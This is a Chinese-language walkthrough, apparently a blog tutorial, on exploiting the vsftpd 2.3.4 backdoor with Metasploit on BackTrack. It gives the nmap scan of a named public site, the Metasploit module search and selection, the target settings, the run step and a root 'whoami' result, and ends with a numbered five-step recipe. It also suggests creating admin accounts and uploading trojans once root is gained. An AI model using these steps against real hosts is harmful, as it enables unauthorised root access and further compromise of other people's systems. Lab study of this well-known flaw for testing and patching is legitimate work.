vsftpd version 2到2.3.4存在后门漏洞,***者可以通过该漏洞获取root权限。这 里用backtrack 集成的metasploit做测试,metasploit集成了各种各样的漏洞,我们可以在上面利用服务器、个人PC和应用程序的漏洞。开始菜单路径 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit Framework/msfconsole, 用metaspolit内置的nmap进行主机扫描


nmap -sT -A www.metasploit.com.cn -sT

 

port 21     vsftpd version 2到2.3.4


是指用隐蔽的tcp进行连接,-A是指在探测中对服务进行详细的版本测试。nmap是一款强大的扫描工具,简单的一些用法可以点击:《Nmap在实战中的高级用法》文章查看。

 

结果显示目标主机上运行着ftp服务器,版本为vsftpd2.3.4,这个版本的vsftpd存在漏洞,***者可以远程获取目标主机的root权限。

 

下面利用metasploit实施***过程,进入metasploit命令行,search vsftpd,搜索有关vsftpd的相关工具和***载荷。查找结果如下:

 

msf > search vsftpd

 

Matching Modules

 ================

 

Name                                  Disclosure Date          Rank       Description

 —-                                  —————          —-       ———–

 exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution

 

利用该漏洞命令:

 

use exploit/unix/ftp/vsftpd_234_backdoor

 

这样提示符就会提示进入到该路径下,show options查看需要设置的相关项:

 

msf  exploit(vsftpd_234_backdoor) > show options

 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

 

Name   Current Setting  Required  Description

 —-   —————  ——–  ———–

 RHOST                   yes       The target address

 RPORT    21          yes       The target port

 

Exploit target:

 

Id  Name

 –  —-

 0   Automatic

 

提示需要设置RHOST(***目标的IP)、RPORT(目标端口),由于这里是***ftp软件,端口默认为21,我们设置一下目标的ip,命令: set rhost 192.168.1.101, 在输入show options回车,确认下参数设置正确。检查无误,输入命令help,查看相关的操纵,一般是run或者exploit即可实施***.

 

 

结果显示已经获取了目标主机的root权限,建立管理员账号、上传***等动作就可以开始了


whoami

root  (已经获取了目标主机的root权限) 


1 先用扫描目标站点 nmap -sT -A www.metasploit.com.cn -sT

2  port 21     vsftpd version 2到2.3.4 ( 此版本存在漏洞,可以利用)

3 搜索工具并利用  search vsftpd   |   use exploit/unix/ftp/vsftpd_234_backdoor

4 根据扫描信息,修改实际***目标ip,端口 

5 run | exploit  执行命令